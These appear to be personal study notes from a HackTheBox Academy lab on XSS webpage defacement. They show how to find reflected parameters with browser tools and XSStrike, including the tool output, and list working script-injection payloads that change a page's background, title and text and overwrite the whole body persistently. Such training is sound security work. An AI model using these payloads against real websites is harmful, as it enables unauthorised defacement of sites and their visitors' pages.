WEBPAGE DEFACEMENT
IDENTIFY XSS VULNERABLE INPUT FIELDS
#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
* review the HTML source and identify parameters
* also review the .js file
#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
input fields: fill in data
* copy the full URL to identify GET request parameters
- http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com
- fullname, username, password, email
#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
XSStrike v3.1.5
[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: fullname
[-] No reflection found
[!] Testing parameter: username
[-] No reflection found
[!] Testing parameter: password
[-] No reflection found
[!] Testing parameter: email
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072
------------------------------------------------------------
[+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``//
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N]
#manually verify the identified parameter
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
* a prompt will be displayedMETHODS
CHANGING WEBPAGE BACKGROUND COLOR
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>document.body.style.background = "#FFFF23"</script>
* ALT: input field: <script>document.body.style.background = "purple"</script>
- the alt method uses named color instead of HEX RGB valuesSETTING AN IMAGE TO THE BACKGROUND
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
SETTING PAGE TITLE
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>document.title = 'HackTheBox Academy'</script>CHANGING PAGE TEXT
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>document.getElementById("todo").innerHTML = "New Text"</script>
* ALT: <script>$("#todo").html('New Text');</script>
- the alt method uses jQuery functionsCHANGING THE ENTIRE HTML CODE OF THE MAIN BODY
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>document.getElementsByTagName('body')[0].innerHTML = "New Text"</script>
* this is what hacking groups typically use by leaving a simple message on the web page
* by specifying [0], the document.getElementByTagName() function will select the first body
element, which should change the entire text of the web pageFULL IMPLEMENTATION
#prepare HTML code locally to see how it'll look
root@oco:~$ nano defacement
<center>
<h1 style="color: white">Cyber Security Training</h1>
<p style="color: white">by
<img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"></p>
</center>
#minify the HTML code
root@oco:~$ BROWSER > https://www.toptal.com/developers/html-minifier
input: ...HTML code...
output: ...minified HTML code...
root@oco:~$ BROWSER > {targetSite:port}
input field: <script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy" /> </p></center>'</script>
* the custom HTML code will now be permanently part of the web page's source code
and will be shown to anyone who visits the page
* when viewing the page's source, the original target's HTML source code will still
exist, and the attacker's injected payloads appear at the endLast updated